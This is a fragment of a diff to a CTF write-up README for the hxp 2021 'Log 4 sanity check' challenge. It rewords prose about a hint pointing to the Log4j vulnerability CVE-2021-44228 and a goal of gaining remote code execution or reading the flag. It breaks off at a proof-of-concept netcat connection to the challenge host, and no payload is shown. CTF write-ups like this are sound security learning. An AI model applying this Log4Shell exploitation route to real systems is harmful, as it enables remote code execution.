Execut3/CTF-WriteUps/2021/hxp/misc/Log 4 sanity check/readme.md

 }
 ```

-Also there is a hint provided in challenge. `https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=6`.
+Also there is a hint provided in the challenge that points to link: `https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=6`.
-Opening this link we will see that it mentioned to vulnerability `CVE-2021-44228` which is vulnerability in Apache Log4j library.
+Opening this link we will see that it is mentioning to vulnerability `CVE-2021-44228` which is vulnerability in Log4j library.

-Knowing these, It is kind of straight forward to do what next.
-We need to use this vuln, and try to gain RCE with log4j vulnerability.
+Knowing this, it is kind of obvious what should we do now.
+We need to use this vuln, and try to gain RCE or Read flag with this vulnerability.

 #### POC
-To check if this vulnerability exists, will send following code:
+Here is the POC for existance of this vulnerability:

 ```bash
 $ nc 65.108.176.77 1337